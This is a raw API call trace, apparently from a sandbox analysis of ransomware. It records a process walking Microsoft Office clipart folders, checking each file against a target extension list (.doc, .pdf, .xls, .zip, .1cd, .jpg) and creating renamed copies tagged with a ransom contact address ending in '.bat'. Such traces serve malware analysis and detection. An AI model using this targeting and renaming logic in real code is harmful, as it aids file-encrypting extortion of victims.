[0174.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00218_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00218_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0174.603] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.603] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.603] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00218_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00218_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.604] CloseHandle (hObject=0x4c4) returned 1 [0174.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00218_.WMF") returned 68 [0174.604] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00218_.WMF") returned 68 [0174.604] lstrlenW (lpString=".doc") returned 4 [0174.604] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.605] lstrlenW (lpString=".docx") returned 5 [0174.605] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.605] lstrlenW (lpString=".pdf") returned 4 [0174.605] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.605] lstrlenW (lpString=".xls") returned 4 [0174.605] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.605] lstrlenW (lpString=".xlsx") returned 5 [0174.605] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.605] lstrlenW (lpString=".ppt") returned 4 [0174.605] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.605] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00218_.WMF") returned 68 [0174.605] lstrlenW (lpString=".zip") returned 4 [0174.605] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.605] lstrlenW (lpString=".rar") returned 4 [0174.605] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.605] lstrlenW (lpString=".bz2") returned 4 [0174.605] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.605] lstrlenW (lpString=".7z") returned 3 [0174.605] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00218_.WMF") returned 68 [0174.606] lstrlenW (lpString=".dbf") returned 4 [0174.606] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00218_.WMF") returned 68 [0174.606] lstrlenW (lpString=".1cd") returned 4 [0174.606] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00218_.WMF") returned 68 [0174.606] lstrlenW (lpString=".jpg") returned 4 [0174.606] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00218_.WMF") returned 68 [0174.606] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00218_.WMF") returned 68 [0174.606] lstrlenW (lpString=".doc") returned 4 [0174.606] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.606] lstrlenW (lpString=".docx") returned 5 [0174.606] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.606] lstrlenW (lpString=".pdf") returned 4 [0174.606] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.606] lstrlenW (lpString=".xls") returned 4 [0174.606] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.606] lstrlenW (lpString=".xlsx") returned 5 [0174.607] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.607] lstrlenW (lpString=".ppt") returned 4 [0174.607] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00218_.WMF") returned 68 [0174.607] lstrlenW (lpString=".zip") returned 4 [0174.607] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.607] lstrlenW (lpString=".rar") returned 4 [0174.607] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.607] lstrlenW (lpString=".bz2") returned 4 [0174.607] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.607] lstrlenW (lpString=".7z") returned 3 [0174.607] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00218_.WMF") returned 68 [0174.607] lstrlenW (lpString=".dbf") returned 4 [0174.607] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00218_.WMF") returned 68 [0174.607] lstrlenW (lpString=".1cd") returned 4 [0174.607] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.607] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00218_.WMF") returned 68 [0174.607] lstrlenW (lpString=".jpg") returned 4 [0174.608] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.608] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0174.608] lstrlenW (lpString="TN00231_.WMF") returned 12 [0174.608] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00231_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00231_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0174.609] GetFileSizeEx (in: hFile=0x4c4, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=1848) returned 1 [0174.609] CloseHandle (hObject=0x4c4) returned 1 [0174.609] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00231_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00231_.wmf")) returned 0x220 [0174.609] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00231_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00231_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0174.609] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00231_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00231_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0174.610] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.610] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.610] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00231_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00231_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.610] CloseHandle (hObject=0x4c4) returned 1 [0174.610] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00231_.WMF") returned 68 [0174.610] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00231_.WMF") returned 68 [0174.610] lstrlenW (lpString=".doc") returned 4 [0174.611] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.611] lstrlenW (lpString=".docx") returned 5 [0174.611] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.611] lstrlenW (lpString=".pdf") returned 4 [0174.611] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.611] lstrlenW (lpString=".xls") returned 4 [0174.611] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.611] lstrlenW (lpString=".xlsx") returned 5 [0174.611] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.611] lstrlenW (lpString=".ppt") returned 4 [0174.611] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.611] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00231_.WMF") returned 68 [0174.611] lstrlenW (lpString=".zip") returned 4 [0174.611] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.611] lstrlenW (lpString=".rar") returned 4 [0174.611] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.611] lstrlenW (lpString=".bz2") returned 4 [0174.611] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.611] lstrlenW (lpString=".7z") returned 3 [0174.611] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.611] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00231_.WMF") returned 68 [0174.611] lstrlenW (lpString=".dbf") returned 4 [0174.611] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00231_.WMF") returned 68 [0174.612] lstrlenW (lpString=".1cd") returned 4 [0174.612] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00231_.WMF") returned 68 [0174.612] lstrlenW (lpString=".jpg") returned 4 [0174.612] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00231_.WMF") returned 68 [0174.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00231_.WMF") returned 68 [0174.612] lstrlenW (lpString=".doc") returned 4 [0174.612] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.612] lstrlenW (lpString=".docx") returned 5 [0174.612] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.612] lstrlenW (lpString=".pdf") returned 4 [0174.612] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.612] lstrlenW (lpString=".xls") returned 4 [0174.612] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.612] lstrlenW (lpString=".xlsx") returned 5 [0174.612] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.612] lstrlenW (lpString=".ppt") returned 4 [0174.612] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.612] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00231_.WMF") returned 68 [0174.613] lstrlenW (lpString=".zip") returned 4 [0174.613] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.613] lstrlenW (lpString=".rar") returned 4 [0174.613] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.613] lstrlenW (lpString=".bz2") returned 4 [0174.613] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.613] lstrlenW (lpString=".7z") returned 3 [0174.613] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00231_.WMF") returned 68 [0174.613] lstrlenW (lpString=".dbf") returned 4 [0174.613] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00231_.WMF") returned 68 [0174.613] lstrlenW (lpString=".1cd") returned 4 [0174.613] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.613] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00231_.WMF") returned 68 [0174.613] lstrlenW (lpString=".jpg") returned 4 [0174.614] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.614] lstrcmpiW (lpString1=".WMF", lpString2=".bat") returned 1 [0174.614] lstrlenW (lpString="TN00234_.WMF") returned 12 [0174.614] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00234_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0174.616] GetFileSizeEx (in: hFile=0x4c4, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=3176) returned 1 [0174.616] CloseHandle (hObject=0x4c4) returned 1 [0174.616] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00234_.wmf")) returned 0x220 [0174.616] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00234_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00234_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0174.616] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00234_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00234_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0174.616] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.617] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.965] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00234_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\tn00234_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.966] CloseHandle (hObject=0x4c4) returned 1 [0174.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00234_.WMF") returned 68 [0174.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00234_.WMF") returned 68 [0174.966] lstrlenW (lpString=".doc") returned 4 [0174.966] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.966] lstrlenW (lpString=".docx") returned 5 [0174.966] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.966] lstrlenW (lpString=".pdf") returned 4 [0174.966] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.966] lstrlenW (lpString=".xls") returned 4 [0174.966] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.966] lstrlenW (lpString=".xlsx") returned 5 [0174.966] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.966] lstrlenW (lpString=".ppt") returned 4 [0174.966] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00234_.WMF") returned 68 [0174.966] lstrlenW (lpString=".zip") returned 4 [0174.966] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.966] lstrlenW (lpString=".rar") returned 4 [0174.966] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.966] lstrlenW (lpString=".bz2") returned 4 [0174.966] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.966] lstrlenW (lpString=".7z") returned 3 [0174.966] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.966] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00234_.WMF") returned 68 [0174.967] lstrlenW (lpString=".dbf") returned 4 [0174.967] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00234_.WMF") returned 68 [0174.967] lstrlenW (lpString=".1cd") returned 4 [0174.967] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00234_.WMF") returned 68 [0174.967] lstrlenW (lpString=".jpg") returned 4 [0174.967] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00234_.WMF") returned 68 [0174.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00234_.WMF") returned 68 [0174.967] lstrlenW (lpString=".doc") returned 4 [0174.967] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0174.967] lstrlenW (lpString=".docx") returned 5 [0174.967] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0174.967] lstrlenW (lpString=".pdf") returned 4 [0174.967] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0174.967] lstrlenW (lpString=".xls") returned 4 [0174.967] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0174.967] lstrlenW (lpString=".xlsx") returned 5 [0174.967] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0174.967] lstrlenW (lpString=".ppt") returned 4 [0174.967] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0174.967] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00234_.WMF") returned 68 [0174.967] lstrlenW (lpString=".zip") returned 4 [0174.967] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0174.967] lstrlenW (lpString=".rar") returned 4 [0174.967] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0174.967] lstrlenW (lpString=".bz2") returned 4 [0174.967] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0174.967] lstrlenW (lpString=".7z") returned 3 [0174.967] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0174.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00234_.WMF") returned 68 [0174.968] lstrlenW (lpString=".dbf") returned 4 [0174.968] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0174.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00234_.WMF") returned 68 [0174.968] lstrlenW (lpString=".1cd") returned 4 [0174.968] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0174.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\TN00234_.WMF") returned 68 [0174.968] lstrlenW (lpString=".jpg") returned 4 [0174.968] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0174.968] lstrcmpiW (lpString1=".GIF", lpString2=".bat") returned 1 [0174.968] lstrlenW (lpString="J0143746.GIF") returned 12 [0174.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143746.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0174.969] GetFileSizeEx (in: hFile=0x4c4, lpFileSize=0x377ff14 | out: lpFileSize=0x377ff14*=1429) returned 1 [0174.969] CloseHandle (hObject=0x4c4) returned 1 [0174.969] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143746.gif")) returned 0x220 [0174.969] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143746.gif.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0174.969] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143746.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x4c4 [0174.970] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.970] SetFilePointerEx (in: hFile=0x4c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x377fec0 | out: lpNewFilePointer=0x0) returned 1 [0174.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\publisher\\backgrounds\\j0143746.gif.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0174.971] CloseHandle (hObject=0x4c4) returned 1 [0174.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF") returned 81 [0174.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF") returned 81 [0174.972] lstrlenW (lpString=".doc") returned 4 [0174.972] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0174.972] lstrlenW (lpString=".docx") returned 5 [0174.972] lstrcmpiW (lpString1=".docx", lpString2="6.GIF") returned -1 [0174.972] lstrlenW (lpString=".pdf") returned 4 [0174.972] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0174.972] lstrlenW (lpString=".xls") returned 4 [0174.972] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0174.972] lstrlenW (lpString=".xlsx") returned 5 [0174.972] lstrcmpiW (lpString1=".xlsx", lpString2="6.GIF") returned -1 [0174.972] lstrlenW (lpString=".ppt") returned 4 [0174.972] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0174.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF") returned 81 [0174.972] lstrlenW (lpString=".zip") returned 4 [0174.972] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0174.972] lstrlenW (lpString=".rar") returned 4 [0174.972] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0174.972] lstrlenW (lpString=".bz2") returned 4 [0174.972] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0174.972] lstrlenW (lpString=".7z") returned 3 [0174.972] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0174.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF") returned 81 [0174.972] lstrlenW (lpString=".dbf") returned 4 [0174.972] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0174.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF") returned 81 [0174.972] lstrlenW (lpString=".1cd") returned 4 [0174.972] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0174.972] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF") returned 81 [0174.972] lstrlenW (lpString=".jpg") returned 4 [0174.973] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0174.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF") returned 81 [0174.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF") returned 81 [0174.973] lstrlenW (lpString=".doc") returned 4 [0174.973] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0174.973] lstrlenW (lpString=".docx") returned 5 [0174.973] lstrcmpiW (lpString1=".docx", lpString2="6.GIF") returned -1 [0174.973] lstrlenW (lpString=".pdf") returned 4 [0174.973] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0174.973] lstrlenW (lpString=".xls") returned 4 [0174.973] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0174.973] lstrlenW (lpString=".xlsx") returned 5 [0174.973] lstrcmpiW (lpString1=".xlsx", lpString2="6.GIF") returned -1 [0174.973] lstrlenW (lpString=".ppt") returned 4 [0174.973] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0174.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF") returned 81 [0174.973] lstrlenW (lpString=".zip") returned 4 [0174.973] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0174.973] lstrlenW (lpString=".rar") returned 4 [0174.973] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0174.973] lstrlenW (lpString=".bz2") returned 4 [0174.973] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0174.973] lstrlenW (lpString=".7z") returned 3 [0174.973] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0174.973] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF") returned 81 [0174.973] lstrlenW (lpString=".dbf") returned 4 [0174.974] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0174.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF") returned 81 [0174.974] lstrlenW (lpString=".1cd") returned 4 [0174.974] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0174.974] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\Publisher\\Backgrounds\\J0143746.GIF") returned 81 [0174.974] lstrlenW (lpString=".jpg") returned 4 